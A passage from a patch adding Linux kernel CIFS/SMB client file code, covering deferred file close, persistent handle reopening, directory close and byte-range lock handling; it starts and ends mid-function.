++			    delayed_work_pending(&cfile->deferred)) {
++				/*
++				 * If there is no pending work, mod_delayed_work queues new work.
++				 * So, Increase the ref count to avoid use-after-free.
++				 */
++				if (!mod_delayed_work(deferredclose_wq,
++						&cfile->deferred, cifs_sb->ctx->closetimeo))
++					cifsFileInfo_get(cfile);
++			} else {
++				/* Deferred close for files */
++				queue_delayed_work(deferredclose_wq,
++						&cfile->deferred, cifs_sb->ctx->closetimeo);
++				cfile->deferred_close_scheduled = true;
++				spin_unlock(&cinode->deferred_lock);
++				return 0;
++			}
++			spin_unlock(&cinode->deferred_lock);
++			_cifsFileInfo_put(cfile, true, false);
++		} else {
++			_cifsFileInfo_put(cfile, true, false);
++			kfree(dclose);
++		}
++	}
++
++	/* return code from the ->release op is always ignored */
++	return 0;
++}
++
++void
++cifs_reopen_persistent_handles(struct cifs_tcon *tcon)
++{
++	struct cifsFileInfo *open_file, *tmp;
++	struct list_head tmp_list;
++
++	if (!tcon->use_persistent || !tcon->need_reopen_files)
++		return;
++
++	tcon->need_reopen_files = false;
++
++	cifs_dbg(FYI, "Reopen persistent handles\n");
++	INIT_LIST_HEAD(&tmp_list);
++
++	/* list all files open on tree connection, reopen resilient handles  */
++	spin_lock(&tcon->open_file_lock);
++	list_for_each_entry(open_file, &tcon->openFileList, tlist) {
++		if (!open_file->invalidHandle)
++			continue;
++		cifsFileInfo_get(open_file);
++		list_add_tail(&open_file->rlist, &tmp_list);
++	}
++	spin_unlock(&tcon->open_file_lock);
++
++	list_for_each_entry_safe(open_file, tmp, &tmp_list, rlist) {
++		if (cifs_reopen_file(open_file, false /* do not flush */))
++			tcon->need_reopen_files = true;
++		list_del_init(&open_file->rlist);
++		cifsFileInfo_put(open_file);
++	}
++}
++
++int cifs_closedir(struct inode *inode, struct file *file)
++{
++	int rc = 0;
++	unsigned int xid;
++	struct cifsFileInfo *cfile = file->private_data;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	char *buf;
++
++	cifs_dbg(FYI, "Closedir inode = 0x%p\n", inode);
++
++	if (cfile == NULL)
++		return rc;
++
++	xid = get_xid();
++	tcon = tlink_tcon(cfile->tlink);
++	server = tcon->ses->server;
++
++	cifs_dbg(FYI, "Freeing private data in close dir\n");
++	spin_lock(&cfile->file_info_lock);
++	if (server->ops->dir_needs_close(cfile)) {
++		cfile->invalidHandle = true;
++		spin_unlock(&cfile->file_info_lock);
++		if (server->ops->close_dir)
++			rc = server->ops->close_dir(xid, tcon, &cfile->fid);
++		else
++			rc = -ENOSYS;
++		cifs_dbg(FYI, "Closing uncompleted readdir with rc %d\n", rc);
++		/* not much we can do if it fails anyway, ignore rc */
++		rc = 0;
++	} else
++		spin_unlock(&cfile->file_info_lock);
++
++	buf = cfile->srch_inf.ntwrk_buf_start;
++	if (buf) {
++		cifs_dbg(FYI, "closedir free smb buf in srch struct\n");
++		cfile->srch_inf.ntwrk_buf_start = NULL;
++		if (cfile->srch_inf.smallBuf)
++			cifs_small_buf_release(buf);
++		else
++			cifs_buf_release(buf);
++	}
++
++	cifs_put_tlink(cfile->tlink);
++	kfree(file->private_data);
++	file->private_data = NULL;
++	/* BB can we lock the filestruct while this is going on? */
++	free_xid(xid);
++	return rc;
++}
++
++static struct cifsLockInfo *
++cifs_lock_init(__u64 offset, __u64 length, __u8 type, __u16 flags)
++{
++	struct cifsLockInfo *lock =
++		kmalloc(sizeof(struct cifsLockInfo), GFP_KERNEL);
++	if (!lock)
++		return lock;
++	lock->offset = offset;
++	lock->length = length;
++	lock->type = type;
++	lock->pid = current->tgid;
++	lock->flags = flags;
++	INIT_LIST_HEAD(&lock->blist);
++	init_waitqueue_head(&lock->block_q);
++	return lock;
++}
++
++void
++cifs_del_lock_waiters(struct cifsLockInfo *lock)
++{
++	struct cifsLockInfo *li, *tmp;
++	list_for_each_entry_safe(li, tmp, &lock->blist, blist) {
++		list_del_init(&li->blist);
++		wake_up(&li->block_q);
++	}
++}
++
++#define CIFS_LOCK_OP	0
++#define CIFS_READ_OP	1
++#define CIFS_WRITE_OP	2
++
++/* @rw_check : 0 - no op, 1 - read, 2 - write */
++static bool
++cifs_find_fid_lock_conflict(struct cifs_fid_locks *fdlocks, __u64 offset,
++			    __u64 length, __u8 type, __u16 flags,
++			    struct cifsFileInfo *cfile,
++			    struct cifsLockInfo **conf_lock, int rw_check)
++{
++	struct cifsLockInfo *li;
++	struct cifsFileInfo *cur_cfile = fdlocks->cfile;
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++
++	list_for_each_entry(li, &fdlocks->locks, llist) {
++		if (offset + length <= li->offset ||
++		    offset >= li->offset + li->length)
++			continue;
++		if (rw_check != CIFS_LOCK_OP && current->tgid == li->pid &&
++		    server->ops->compare_fids(cfile, cur_cfile)) {
++			/* shared lock prevents write op through the same fid */
++			if (!(li->type & server->vals->shared_lock_type) ||
++			    rw_check != CIFS_WRITE_OP)
++				continue;
++		}
++		if ((type & server->vals->shared_lock_type) &&
++		    ((server->ops->compare_fids(cfile, cur_cfile) &&
++		     current->tgid == li->pid) || type == li->type))
++			continue;
++		if (rw_check == CIFS_LOCK_OP &&
++		    (flags & FL_OFDLCK) && (li->flags & FL_OFDLCK) &&
++		    server->ops->compare_fids(cfile, cur_cfile))
++			continue;
++		if (conf_lock)
++			*conf_lock = li;
++		return true;
++	}
++	return false;
++}
++
++bool
++cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
++			__u8 type, __u16 flags,
++			struct cifsLockInfo **conf_lock, int rw_check)
++{
++	bool rc = false;
++	struct cifs_fid_locks *cur;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++
++	list_for_each_entry(cur, &cinode->llist, llist) {
++		rc = cifs_find_fid_lock_conflict(cur, offset, length, type,
++						 flags, cfile, conf_lock,
++						 rw_check);
++		if (rc)
++			break;
++	}
++
++	return rc;
++}
++
++/*
++ * Check if there is another lock that prevents us to set the lock (mandatory
++ * style). If such a lock exists, update the flock structure with its
++ * properties. Otherwise, set the flock type to F_UNLCK if we can cache brlocks
++ * or leave it the same if we can't. Returns 0 if we don't need to request to
++ * the server or 1 otherwise.
++ */
++static int
++cifs_lock_test(struct cifsFileInfo *cfile, __u64 offset, __u64 length,
++	       __u8 type, struct file_lock *flock)
++{
++	int rc = 0;
++	struct cifsLockInfo *conf_lock;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct TCP_Server_Info *server = tlink_tcon(cfile->tlink)->ses->server;
++	bool exist;
++
++	down_read(&cinode->lock_sem);
++
++	exist = cifs_find_lock_conflict(cfile, offset, length, type,
++					flock->fl_flags, &conf_lock,
++					CIFS_LOCK_OP);
++	if (exist) {
++		flock->fl_start = conf_lock->offset;
++		flock->fl_end = conf_lock->offset + conf_lock->length - 1;
++		flock->fl_pid = conf_lock->pid;
++		if (conf_lock->type & server->vals->shared_lock_type)
++			flock->fl_type = F_RDLCK;
++		else
++			flock->fl_type = F_WRLCK;
++	} else if (!cinode->can_cache_brlcks)
++		rc = 1;
++	else
++		flock->fl_type = F_UNLCK;
++
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++static void
++cifs_lock_add(struct cifsFileInfo *cfile, struct cifsLockInfo *lock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	cifs_down_write(&cinode->lock_sem);
++	list_add_tail(&lock->llist, &cfile->llist->locks);
++	up_write(&cinode->lock_sem);
++}
++
++/*
++ * Set the byte-range lock (mandatory style). Returns:
++ * 1) 0, if we set the lock and don't need to request to the server;
++ * 2) 1, if no locks prevent us but we need to request to the server;
++ * 3) -EACCES, if there is a lock that prevents us and wait is false.
++ */
++static int
++cifs_lock_add_if(struct cifsFileInfo *cfile, struct cifsLockInfo *lock,
++		 bool wait)
++{
++	struct cifsLockInfo *conf_lock;
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	bool exist;
++	int rc = 0;
++
++try_again:
++	exist = false;
++	cifs_down_write(&cinode->lock_sem);
++
++	exist = cifs_find_lock_conflict(cfile, lock->offset, lock->length,
++					lock->type, lock->flags, &conf_lock,
++					CIFS_LOCK_OP);
++	if (!exist && cinode->can_cache_brlcks) {
++		list_add_tail(&lock->llist, &cfile->llist->locks);
++		up_write(&cinode->lock_sem);
++		return rc;
++	}
++
++	if (!exist)
++		rc = 1;
++	else if (!wait)
++		rc = -EACCES;
++	else {
++		list_add_tail(&lock->blist, &conf_lock->blist);
++		up_write(&cinode->lock_sem);
++		rc = wait_event_interruptible(lock->block_q,
++					(lock->blist.prev == &lock->blist) &&
++					(lock->blist.next == &lock->blist));
++		if (!rc)
++			goto try_again;
++		cifs_down_write(&cinode->lock_sem);
++		list_del_init(&lock->blist);
++	}
++
++	up_write(&cinode->lock_sem);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/*
++ * Check if there is another lock that prevents us to set the lock (posix
++ * style). If such a lock exists, update the flock structure with its
++ * properties. Otherwise, set the flock type to F_UNLCK if we can cache brlocks
++ * or leave it the same if we can't. Returns 0 if we don't need to request to
++ * the server or 1 otherwise.
++ */
++static int
++cifs_posix_lock_test(struct file *file, struct file_lock *flock)
++{
++	int rc = 0;
++	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
++	unsigned char saved_type = flock->fl_type;
++
++	if ((flock->fl_flags & FL_POSIX) == 0)
++		return 1;
++
++	down_read(&cinode->lock_sem);
++	posix_test_lock(file, flock);
++
++	if (flock->fl_type == F_UNLCK && !cinode->can_cache_brlcks) {
++		flock->fl_type = saved_type;
++		rc = 1;
++	}
++
++	up_read(&cinode->lock_sem);
++	return rc;
++}
++
++/*
++ * Set the byte-range lock (posix style). Returns:
++ * 1) <0, if the error occurs while setting the lock;
++ * 2) 0, if we set the lock and don't need to request to the server;
++ * 3) FILE_LOCK_DEFERRED, if we will wait for some other file_lock;
++ * 4) FILE_LOCK_DEFERRED + 1, if we need to request to the server.
++ */
++static int
++cifs_posix_lock_set(struct file *file, struct file_lock *flock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(file_inode(file));
++	int rc = FILE_LOCK_DEFERRED + 1;
++
++	if ((flock->fl_flags & FL_POSIX) == 0)
++		return rc;
++
++	cifs_down_write(&cinode->lock_sem);
++	if (!cinode->can_cache_brlcks) {
++		up_write(&cinode->lock_sem);
++		return rc;
++	}
++
++	rc = posix_lock_file(file, flock, NULL);
++	up_write(&cinode->lock_sem);
++	return rc;
++}
++
++int
++cifs_push_mandatory_locks(struct cifsFileInfo *cfile)
++{
++	unsigned int xid;
++	int rc = 0, stored_rc;
++	struct cifsLockInfo *li, *tmp;
++	struct cifs_tcon *tcon;
++	unsigned int num, max_num, max_buf;
++	LOCKING_ANDX_RANGE *buf, *cur;
++	static const int types[] = {
++		LOCKING_ANDX_LARGE_FILES,
++		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
++	};
++	int i;
++
++	xid = get_xid();
++	tcon = tlink_tcon(cfile->tlink);
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it before using.
++	 */
++	max_buf = tcon->ses->server->maxBuf;
++	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE))) {
++		free_xid(xid);
++		return -EINVAL;
++	}
++
++	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
++		     PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
++			PAGE_SIZE);
++	max_num = (max_buf - sizeof(struct smb_hdr)) /
++						sizeof(LOCKING_ANDX_RANGE);
++	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
++	if (!buf) {
++		free_xid(xid);
++		return -ENOMEM;
++	}
++
++	for (i = 0; i < 2; i++) {
++		cur = buf;
++		num = 0;
++		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
++			if (li->type != types[i])
++				continue;
++			cur->Pid = cpu_to_le16(li->pid);
++			cur->LengthLow = cpu_to_le32((u32)li->length);
++			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
++			cur->OffsetLow = cpu_to_le32((u32)li->offset);
++			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
++			if (++num == max_num) {
++				stored_rc = cifs_lockv(xid, tcon,
++						       cfile->fid.netfid,
++						       (__u8)li->type, 0, num,
++						       buf);
++				if (stored_rc)
++					rc = stored_rc;
++				cur = buf;
++				num = 0;
++			} else
++				cur++;
++		}
++
++		if (num) {
++			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
++					       (__u8)types[i], 0, num, buf);
++			if (stored_rc)
++				rc = stored_rc;
++		}
++	}
++
++	kfree(buf);
++	free_xid(xid);
++	return rc;
++}
++
++static __u32
++hash_lockowner(fl_owner_t owner)
++{
++	return cifs_lock_secret ^ hash32_ptr((const void *)owner);
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++struct lock_to_push {
++	struct list_head llist;
++	__u64 offset;
++	__u64 length;
++	__u32 pid;
++	__u16 netfid;
++	__u8 type;
++};
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++static int
++cifs_push_posix_locks(struct cifsFileInfo *cfile)
++{
++	struct inode *inode = d_inode(cfile->dentry);
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct file_lock *flock;
++	struct file_lock_context *flctx = inode->i_flctx;
++	unsigned int count = 0, i;
++	int rc = 0, xid, type;
++	struct list_head locks_to_send, *el;
++	struct lock_to_push *lck, *tmp;
++	__u64 length;
++
++	xid = get_xid();
++
++	if (!flctx)
++		goto out;
++
++	spin_lock(&flctx->flc_lock);
++	list_for_each(el, &flctx->flc_posix) {
++		count++;
++	}
++	spin_unlock(&flctx->flc_lock);
++
++	INIT_LIST_HEAD(&locks_to_send);
++
++	/*
++	 * Allocating count locks is enough because no FL_POSIX locks can be
++	 * added to the list while we are holding cinode->lock_sem that
++	 * protects locking operations of this inode.
++	 */
++	for (i = 0; i < count; i++) {
++		lck = kmalloc(sizeof(struct lock_to_push), GFP_KERNEL);
++		if (!lck) {
++			rc = -ENOMEM;
++			goto err_out;
++		}
++		list_add_tail(&lck->llist, &locks_to_send);
++	}
++
++	el = locks_to_send.next;
++	spin_lock(&flctx->flc_lock);
++	list_for_each_entry(flock, &flctx->flc_posix, fl_list) {
++		if (el == &locks_to_send) {
++			/*
++			 * The list ended. We don't have enough allocated
++			 * structures - something is really wrong.
++			 */
++			cifs_dbg(VFS, "Can't push all brlocks!\n");
++			break;
++		}
++		length = cifs_flock_len(flock);
++		if (flock->fl_type == F_RDLCK || flock->fl_type == F_SHLCK)
++			type = CIFS_RDLCK;
++		else
++			type = CIFS_WRLCK;
++		lck = list_entry(el, struct lock_to_push, llist);
++		lck->pid = hash_lockowner(flock->fl_owner);
++		lck->netfid = cfile->fid.netfid;
++		lck->length = length;
++		lck->type = type;
++		lck->offset = flock->fl_start;
++	}
++	spin_unlock(&flctx->flc_lock);
++
++	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
++		int stored_rc;
++
++		stored_rc = CIFSSMBPosixLock(xid, tcon, lck->netfid, lck->pid,
++					     lck->offset, lck->length, NULL,
++					     lck->type, 0);
++		if (stored_rc)
++			rc = stored_rc;
++		list_del(&lck->llist);
++		kfree(lck);
++	}
++
++out:
++	free_xid(xid);
++	return rc;
++err_out:
++	list_for_each_entry_safe(lck, tmp, &locks_to_send, llist) {
++		list_del(&lck->llist);
++		kfree(lck);
++	}
++	goto out;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_push_locks(struct cifsFileInfo *cfile)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	int rc = 0;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	struct cifs_sb_info *cifs_sb = CIFS_SB(cfile->dentry->d_sb);
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	/* we are going to update can_cache_brlcks here - need a write access */
++	cifs_down_write(&cinode->lock_sem);
++	if (!cinode->can_cache_brlcks) {
++		up_write(&cinode->lock_sem);
++		return rc;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		rc = cifs_push_posix_locks(cfile);
++	else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		rc = tcon->ses->server->ops->push_mand_locks(cfile);
++
++	cinode->can_cache_brlcks = false;
++	up_write(&cinode->lock_sem);
++	return rc;
++}
++
++static void
++cifs_read_flock(struct file_lock *flock, __u32 *type, int *lock, int *unlock,
++		bool *wait_flag, struct TCP_Server_Info *server)
++{
++	if (flock->fl_flags & FL_POSIX)
++		cifs_dbg(FYI, "Posix\n");
++	if (flock->fl_flags & FL_FLOCK)
++		cifs_dbg(FYI, "Flock\n");
++	if (flock->fl_flags & FL_SLEEP) {
++		cifs_dbg(FYI, "Blocking lock\n");
++		*wait_flag = true;
++	}
++	if (flock->fl_flags & FL_ACCESS)
++		cifs_dbg(FYI, "Process suspended by mandatory locking - not implemented yet\n");
++	if (flock->fl_flags & FL_LEASE)
++		cifs_dbg(FYI, "Lease on file - not implemented yet\n");
++	if (flock->fl_flags &
++	    (~(FL_POSIX | FL_FLOCK | FL_SLEEP |
++	       FL_ACCESS | FL_LEASE | FL_CLOSE | FL_OFDLCK)))
++		cifs_dbg(FYI, "Unknown lock flags 0x%x\n", flock->fl_flags);
++
++	*type = server->vals->large_lock_type;
++	if (flock->fl_type == F_WRLCK) {
++		cifs_dbg(FYI, "F_WRLCK\n");
++		*type |= server->vals->exclusive_lock_type;
++		*lock = 1;
++	} else if (flock->fl_type == F_UNLCK) {
++		cifs_dbg(FYI, "F_UNLCK\n");
++		*type |= server->vals->unlock_lock_type;
++		*unlock = 1;
++		/* Check if unlock includes more than one lock range */
++	} else if (flock->fl_type == F_RDLCK) {
++		cifs_dbg(FYI, "F_RDLCK\n");
++		*type |= server->vals->shared_lock_type;
++		*lock = 1;
++	} else if (flock->fl_type == F_EXLCK) {
++		cifs_dbg(FYI, "F_EXLCK\n");
++		*type |= server->vals->exclusive_lock_type;
++		*lock = 1;
++	} else if (flock->fl_type == F_SHLCK) {
++		cifs_dbg(FYI, "F_SHLCK\n");
++		*type |= server->vals->shared_lock_type;
++		*lock = 1;
++	} else
++		cifs_dbg(FYI, "Unknown type of lock\n");
++}
++
++static int
++cifs_getlk(struct file *file, struct file_lock *flock, __u32 type,
++	   bool wait_flag, bool posix_lck, unsigned int xid)
++{
++	int rc = 0;
++	__u64 length = cifs_flock_len(flock);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	__u16 netfid = cfile->fid.netfid;
++
++	if (posix_lck) {
++		int posix_lock_type;
++
++		rc = cifs_posix_lock_test(file, flock);
++		if (!rc)
++			return rc;
++
++		if (type & server->vals->shared_lock_type)
++			posix_lock_type = CIFS_RDLCK;
++		else
++			posix_lock_type = CIFS_WRLCK;
++		rc = CIFSSMBPosixLock(xid, tcon, netfid,
++				      hash_lockowner(flock->fl_owner),
++				      flock->fl_start, length, flock,
++				      posix_lock_type, wait_flag);
++		return rc;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++	rc = cifs_lock_test(cfile, flock->fl_start, length, type, flock);
++	if (!rc)
++		return rc;
++
++	/* BB we could chain these into one lock request BB */
++	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length, type,
++				    1, 0, false);
++	if (rc == 0) {
++		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++					    type, 0, 1, false);
++		flock->fl_type = F_UNLCK;
++		if (rc != 0)
++			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
++				 rc);
++		return 0;
++	}
++
++	if (type & server->vals->shared_lock_type) {
++		flock->fl_type = F_WRLCK;
++		return 0;
++	}
++
++	type &= ~server->vals->exclusive_lock_type;
++
++	rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++				    type | server->vals->shared_lock_type,
++				    1, 0, false);
++	if (rc == 0) {
++		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++			type | server->vals->shared_lock_type, 0, 1, false);
++		flock->fl_type = F_RDLCK;
++		if (rc != 0)
++			cifs_dbg(VFS, "Error unlocking previously locked range %d during test of lock\n",
++				 rc);
++	} else
++		flock->fl_type = F_WRLCK;
++
++	return 0;
++}
++
++void
++cifs_move_llist(struct list_head *source, struct list_head *dest)
++{
++	struct list_head *li, *tmp;
++	list_for_each_safe(li, tmp, source)
++		list_move(li, dest);
++}
++
++void
++cifs_free_llist(struct list_head *llist)
++{
++	struct cifsLockInfo *li, *tmp;
++	list_for_each_entry_safe(li, tmp, llist, llist) {
++		cifs_del_lock_waiters(li);
++		list_del(&li->llist);
++		kfree(li);
++	}
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++int
++cifs_unlock_range(struct cifsFileInfo *cfile, struct file_lock *flock,
++		  unsigned int xid)
++{
++	int rc = 0, stored_rc;
++	static const int types[] = {
++		LOCKING_ANDX_LARGE_FILES,
++		LOCKING_ANDX_SHARED_LOCK | LOCKING_ANDX_LARGE_FILES
++	};
++	unsigned int i;
++	unsigned int max_num, num, max_buf;
++	LOCKING_ANDX_RANGE *buf, *cur;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	struct cifsLockInfo *li, *tmp;
++	__u64 length = cifs_flock_len(flock);
++	struct list_head tmp_llist;
++
++	INIT_LIST_HEAD(&tmp_llist);
++
++	/*
++	 * Accessing maxBuf is racy with cifs_reconnect - need to store value
++	 * and check it before using.
++	 */
++	max_buf = tcon->ses->server->maxBuf;
++	if (max_buf < (sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE)))
++		return -EINVAL;
++
++	BUILD_BUG_ON(sizeof(struct smb_hdr) + sizeof(LOCKING_ANDX_RANGE) >
++		     PAGE_SIZE);
++	max_buf = min_t(unsigned int, max_buf - sizeof(struct smb_hdr),
++			PAGE_SIZE);
++	max_num = (max_buf - sizeof(struct smb_hdr)) /
++						sizeof(LOCKING_ANDX_RANGE);
++	buf = kcalloc(max_num, sizeof(LOCKING_ANDX_RANGE), GFP_KERNEL);
++	if (!buf)
++		return -ENOMEM;
++
++	cifs_down_write(&cinode->lock_sem);
++	for (i = 0; i < 2; i++) {
++		cur = buf;
++		num = 0;
++		list_for_each_entry_safe(li, tmp, &cfile->llist->locks, llist) {
++			if (flock->fl_start > li->offset ||
++			    (flock->fl_start + length) <
++			    (li->offset + li->length))
++				continue;
++			if (current->tgid != li->pid)
++				continue;
++			if (types[i] != li->type)
++				continue;
++			if (cinode->can_cache_brlcks) {
++				/*
++				 * We can cache brlock requests - simply remove
++				 * a lock from the file's list.
++				 */
++				list_del(&li->llist);
++				cifs_del_lock_waiters(li);
++				kfree(li);
++				continue;
++			}
++			cur->Pid = cpu_to_le16(li->pid);
++			cur->LengthLow = cpu_to_le32((u32)li->length);
++			cur->LengthHigh = cpu_to_le32((u32)(li->length>>32));
++			cur->OffsetLow = cpu_to_le32((u32)li->offset);
++			cur->OffsetHigh = cpu_to_le32((u32)(li->offset>>32));
++			/*
++			 * We need to save a lock here to let us add it again to
++			 * the file's list if the unlock range request fails on
++			 * the server.
++			 */
++			list_move(&li->llist, &tmp_llist);
++			if (++num == max_num) {
++				stored_rc = cifs_lockv(xid, tcon,
++						       cfile->fid.netfid,
++						       li->type, num, 0, buf);
++				if (stored_rc) {
++					/*
++					 * We failed on the unlock range
++					 * request - add all locks from the tmp
++					 * list to the head of the file's list.
++					 */
++					cifs_move_llist(&tmp_llist,
++							&cfile->llist->locks);
++					rc = stored_rc;
++				} else
++					/*
++					 * The unlock range request succeed -
++					 * free the tmp list.
++					 */
++					cifs_free_llist(&tmp_llist);
++				cur = buf;
++				num = 0;
++			} else
++				cur++;
++		}
++		if (num) {
++			stored_rc = cifs_lockv(xid, tcon, cfile->fid.netfid,
++					       types[i], num, 0, buf);
++			if (stored_rc) {
++				cifs_move_llist(&tmp_llist,
++						&cfile->llist->locks);
++				rc = stored_rc;
++			} else
++				cifs_free_llist(&tmp_llist);
++		}
++	}
++
++	up_write(&cinode->lock_sem);
++	kfree(buf);
++	return rc;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static int
++cifs_setlk(struct file *file, struct file_lock *flock, __u32 type,
++	   bool wait_flag, bool posix_lck, int lock, int unlock,
++	   unsigned int xid)
++{
++	int rc = 0;
++	__u64 length = cifs_flock_len(flock);
++	struct cifsFileInfo *cfile = (struct cifsFileInfo *)file->private_data;
++	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	struct inode *inode = d_inode(cfile->dentry);
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (posix_lck) {
++		int posix_lock_type;
++
++		rc = cifs_posix_lock_set(file, flock);
++		if (rc <= FILE_LOCK_DEFERRED)
++			return rc;
++
++		if (type & server->vals->shared_lock_type)
++			posix_lock_type = CIFS_RDLCK;
++		else
++			posix_lock_type = CIFS_WRLCK;
++
++		if (unlock == 1)
++			posix_lock_type = CIFS_UNLCK;
++
++		rc = CIFSSMBPosixLock(xid, tcon, cfile->fid.netfid,
++				      hash_lockowner(flock->fl_owner),
++				      flock->fl_start, length,
++				      NULL, posix_lock_type, wait_flag);
++		goto out;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	if (lock) {
++		struct cifsLockInfo *lock;
++
++		lock = cifs_lock_init(flock->fl_start, length, type,
++				      flock->fl_flags);
++		if (!lock)
++			return -ENOMEM;
++
++		rc = cifs_lock_add_if(cfile, lock, wait_flag);
++		if (rc < 0) {
++			kfree(lock);
++			return rc;
++		}
++		if (!rc)
++			goto out;
++
++		/*
++		 * Windows 7 server can delay breaking lease from read to None
++		 * if we set a byte-range lock on a file - break it explicitly
++		 * before sending the lock to the server to be sure the next
++		 * read won't conflict with non-overlapted locks due to
++		 * pagereading.
++		 */
++		if (!CIFS_CACHE_WRITE(CIFS_I(inode)) &&
++					CIFS_CACHE_READ(CIFS_I(inode))) {
++			cifs_zap_mapping(inode);
++			cifs_dbg(FYI, "Set no oplock for inode=%p due to mand locks\n",
++				 inode);
++			CIFS_I(inode)->oplock = 0;
++		}
++
++		rc = server->ops->mand_lock(xid, cfile, flock->fl_start, length,
++					    type, 1, 0, wait_flag);
++		if (rc) {
++			kfree(lock);
++			return rc;
++		}
++
++		cifs_lock_add(cfile, lock);
++	} else if (unlock)
++		rc = server->ops->mand_unlock_range(cfile, flock, xid);
++
++out:
++	if ((flock->fl_flags & FL_POSIX) || (flock->fl_flags & FL_FLOCK)) {
++		/*
++		 * If this is a request to remove all locks because we
++		 * are closing the file, it doesn't matter if the
++		 * unlocking failed as both cifs.ko and the SMB server
++		 * remove the lock on file close
++		 */
++		if (rc) {
++			cifs_dbg(VFS, "%s failed rc=%d\n", __func__, rc);
++			if (!(flock->fl_flags & FL_CLOSE))
++				return rc;
++		}
++		rc = locks_lock_file_wait(file, flock);
++	}
++	return rc;
++}
++
++int cifs_flock(struct file *file, int cmd, struct file_lock *fl)
++{
++	int rc, xid;
++	int lock = 0, unlock = 0;
++	bool wait_flag = false;
++	bool posix_lck = false;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++	__u32 type;
++
++	xid = get_xid();
++
++	if (!(fl->fl_flags & FL_FLOCK)) {
++		rc = -ENOLCK;
++		free_xid(xid);
++		return rc;
++	}
++
++	cfile = (struct cifsFileInfo *)file->private_data;
++	tcon = tlink_tcon(cfile->tlink);
++
++	cifs_read_flock(fl, &type, &lock, &unlock, &wait_flag,
++			tcon->ses->server);
++	cifs_sb = CIFS_FILE_SB(file);
++
++	if (cap_unix(tcon->ses) &&
++	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
++	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
++		posix_lck = true;
++
++	if (!lock && !unlock) {
++		/*
++		 * if no lock or unlock then nothing to do since we do not
++		 * know what it is
++		 */
++		rc = -EOPNOTSUPP;
++		free_xid(xid);
++		return rc;
++	}
++
++	rc = cifs_setlk(file, fl, type, wait_flag, posix_lck, lock, unlock,
++			xid);
++	free_xid(xid);
++	return rc;
++
++
++}
++
++int cifs_lock(struct file *file, int cmd, struct file_lock *flock)
++{
++	int rc, xid;
++	int lock = 0, unlock = 0;
++	bool wait_flag = false;
++	bool posix_lck = false;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++	__u32 type;
++
++	rc = -EACCES;
++	xid = get_xid();
++
